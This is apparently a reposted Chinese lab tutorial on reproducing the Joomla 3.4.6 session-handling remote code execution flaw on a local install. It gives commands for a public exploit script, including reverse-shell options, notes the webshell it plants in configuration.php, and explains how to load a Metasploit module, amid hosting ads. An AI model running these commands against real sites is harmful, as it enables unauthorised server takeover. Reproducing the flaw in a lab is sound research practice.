如何進(jìn)行Joomla3.4.6遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)

本篇文章給大家分享的是有關(guān)如何進(jìn)行Joomla 3.4.6 遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn),小編覺得挺實(shí)用的,因此分享給大家學(xué)習(xí),希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。

創(chuàng)新互聯(lián)公司客戶idc服務(wù)中心,提供成都棕樹機(jī)房、成都服務(wù)器、成都主機(jī)托管、成都雙線服務(wù)器等業(yè)務(wù)的一站式服務(wù)。通過各地的服務(wù)中心,我們向成都用戶提供優(yōu)質(zhì)廉價(jià)的產(chǎn)品以及開放、透明、穩(wěn)定、高性價(jià)比的服務(wù),資深網(wǎng)絡(luò)工程師在機(jī)房提供7*24小時(shí)標(biāo)準(zhǔn)級(jí)技術(shù)保障。

0x00 簡介


Joomla是一套全球知名的內(nèi)容管理系統(tǒng)。

Joomla是使用PHP語言加上MySQL數(shù)據(jù)庫所開發(fā)的軟件系統(tǒng)。

可以在Linux、Windows、MacOSX等各種不同的平臺(tái)上執(zhí)行。目前由Open Source Matters開源組織進(jìn)行開發(fā)與支持。

0x01 漏洞概述


Alessandro Groppo @Hacktive Security于2019-10-02在exploit-db( https://www.exploit-db.com/exploits/47465)發(fā)布了Joomla命令執(zhí)行的EXP,漏洞本質(zhì)是Joomla對(duì)session數(shù)據(jù)處理不當(dāng),未經(jīng)授權(quán)的攻擊者可以發(fā)送精心構(gòu)造的惡意 HTTP 請(qǐng)求,獲取服務(wù)器權(quán)限,實(shí)現(xiàn)遠(yuǎn)程命令執(zhí)行。

0x02 影響范圍


3.0.0 <= Joomla <= 3.4.6

0x03 環(huán)境搭建


懶人搭建php環(huán)境當(dāng)然是選擇wamp/phpstudy啦

下載鏈接:

https://downloads.joomla.org/it/cms/joomla3/3-4-6 

下載解壓后放入wamp/www/Joomla或者phpstudy/PHPTutorial/WWW/Joomla/目錄下,訪問http://127.0.0.1/Joomla/準(zhǔn)備安裝

安裝流程如下:

如何進(jìn)行Joomla 3.4.6 遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)

如何進(jìn)行Joomla 3.4.6 遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)

默認(rèn)root/空

如何進(jìn)行Joomla 3.4.6 遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)

如何進(jìn)行Joomla 3.4.6 遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)

如何進(jìn)行Joomla 3.4.6 遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)

至此,環(huán)境搭建完畢。

0x04 漏洞利用


下載漏洞利用腳本:

https://github.com/kiks7/rusty_joomla_rce

漏洞檢測(cè): 

python3 rusty_joomla_exploit.py -t http://127.0.0.1/Joomla/ -c

注意URL一定要以/結(jié)尾 /結(jié)尾 /結(jié)尾 (別問我為什么, 說多了都是淚…腳本里有url拼接)

如何進(jìn)行Joomla 3.4.6 遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)

漏洞利用: 

python3 rusty_joomla_exploit.py -t http://127.0.0.1/Joomla/ -e -l 127.0.0.1 -p 2333

(-e -l -p參數(shù)可以反彈shell, 本文并沒有反彈成功, 但是可以看到馬的密碼)

如何進(jìn)行Joomla 3.4.6 遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)

一句話客戶端連接

http://127.0.0.1/Joomla/configuration.php

由于貧道用的公司的辦公電腦沒有菜刀之類的工具簡單截個(gè)hackbar返回的圖:

如何進(jìn)行Joomla 3.4.6 遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)

BY THE WAY…

作者同時(shí)提供了msf下的EXP:

metasploit_rusty_joomla_rce.rb 

輕輕放入目錄: 

/usr/share/metasploit-framework/modules/exploits/multi/php/

msfconsole -> reload_all -> search joomla_rce -> use xxxxx -> info

0x05 修復(fù)方式

更新至官網(wǎng)最新版本

以上就是如何進(jìn)行Joomla 3.4.6 遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn),小編相信有部分知識(shí)點(diǎn)可能是我們?nèi)粘9ぷ鲿?huì)見到或用到的。希望你能通過這篇文章學(xué)到更多知識(shí)。更多詳情敬請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。

當(dāng)前標(biāo)題:如何進(jìn)行Joomla3.4.6遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)
地址分享:http://muchs.cn/article34/jpdise.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站營銷、自適應(yīng)網(wǎng)站建站公司、移動(dòng)網(wǎng)站建設(shè)、網(wǎng)站收錄、定制開發(fā)

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)

h5響應(yīng)式網(wǎng)站建設(shè)